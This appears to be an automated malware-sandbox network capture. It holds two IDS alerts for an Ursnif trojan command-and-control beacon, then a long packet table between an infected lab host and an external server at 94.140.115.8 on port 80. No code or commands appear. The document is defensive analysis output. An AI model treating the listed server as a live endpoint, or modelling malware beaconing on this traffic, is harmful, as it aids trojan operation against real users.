04/28/22-15:47:52.636763 04/28/22-15:47:52.636763 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
04/28/22-15:47:51.337694 04/28/22-15:47:51.337694 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 28, 2022 15:47:50.154853106 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.218705893 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.218843937 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.266267061 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.320728064 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638051987 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638118029 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638174057 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638236046 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638288975 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.638313055 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.638349056 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638394117 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638417006 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638451099 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638520956 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.638530970 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.638581038 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638623953 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.638645887 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.638681889 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.726372004 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.726438999 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.726490021 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.726505041 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.726519108 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.726572990 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.726584911 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.726670027 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.726720095 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.726751089 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.726792097 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.726804972 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.726833105 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.726881027 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.726908922 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.726959944 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.726972103 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.727008104 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.727075100 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.727114916 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.727133989 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.727178097 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.727196932 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.727238894 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.727242947 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.727287054 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.776987076 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.777057886 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.777101994 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.777141094 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.777159929 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.777196884 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.777245045 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.777256012 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.777292013 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.777318001 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.777363062 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.805203915 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.805263042 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.805308104 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.805382013 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.805407047 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.805668116 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.805738926 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.833364010 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.833420038 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.833460093 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.833483934 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.833512068 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.833556890 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.833636045 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.833705902 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.833755016 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.833769083 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.833798885 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.833830118 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.833878040 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.833890915 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.833925009 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.833950043 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.833991051 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.834007978 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.834045887 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.834068060 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.834115028 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.834126949 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.834172964 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.872472048 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.872628927 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.881824970 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.881871939 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.881913900 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.881953955 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.881974936 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.882004976 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.882044077 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.882057905 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.882092953 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.882117033 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.882174969 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.882219076 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.882268906 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.882337093 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.882375956 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.882395029 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.882424116 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.882481098 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.882525921 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.882566929 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.882613897 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.882657051 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.882704973 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.888736010 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.888778925 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.888818979 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.888858080 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.888876915 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.927875042 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.927942991 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.927987099 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.928030968 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.928056955 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.928109884 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.928162098 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.928175926 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.928205013 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.928234100 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.928275108 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.929815054 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.929861069 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.929898024 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.929919958 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.929939032 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.929980040 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.933605909 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.933710098 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.976166010 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.976196051 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.976227999 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.976243973 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.976264954 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.976280928 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.976291895 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.976316929 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.976325035 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.976352930 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.976366043 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.976399899 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.976648092 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.976672888 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.976697922 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.976706028 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.976722956 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.976739883 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.976964951 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.976991892 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.977030993 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.977041960 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.977081060 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.982196093 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.982223034 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.982247114 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:50.982307911 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.982362986 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:50.999259949 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.000253916 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.025690079 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.025724888 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.025751114 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.025774002 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.025820017 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.025924921 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.025942087 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.025960922 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.025971889 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.026014090 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.027251005 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.027282953 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.027302027 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.027371883 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.027399063 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.027434111 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.027456045 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.027482033 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.027502060 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.027513981 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.027829885 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.034410954 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.034437895 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.034461975 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.034488916 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.034509897 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.073473930 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.073555946 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.084990025 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.085028887 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.085057974 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.085151911 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.085184097 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.086232901 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.086258888 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.086276054 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.086293936 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.086304903 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.086323023 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.086332083 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.086348057 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.086375952 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.086441994 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.086514950 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.086533070 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.086550951 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.086579084 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.086615086 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.101583004 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.101609945 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.101629019 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.101737976 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.155438900 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.155518055 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.155563116 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.155654907 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.155695915 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.157845974 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.157887936 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.157929897 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.157968998 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.157987118 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.158023119 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.158046007 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.158085108 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.158109903 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.158138990 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.158198118 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.158238888 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.158257961 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.158304930 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.158318996 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.158364058 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.161838055 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.161948919 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.180875063 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.180948973 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.180983067 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.181211948 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.238802910 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.238836050 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.238859892 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.238882065 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.238904953 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.238926888 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.238984108 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.239007950 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.241864920 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.241888046 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.241908073 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.241952896 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.241969109 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.241991043 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.242043972 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.242093086 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.337693930 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.413091898 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747339010 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747370958 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747390032 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747409105 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747426987 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747445107 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747459888 CEST | 80 | 49759 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:47:51.747492075 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:47:51.747548103 CEST | 49759 | 80 | 192.168.2.4 | 94.140.115.8 |
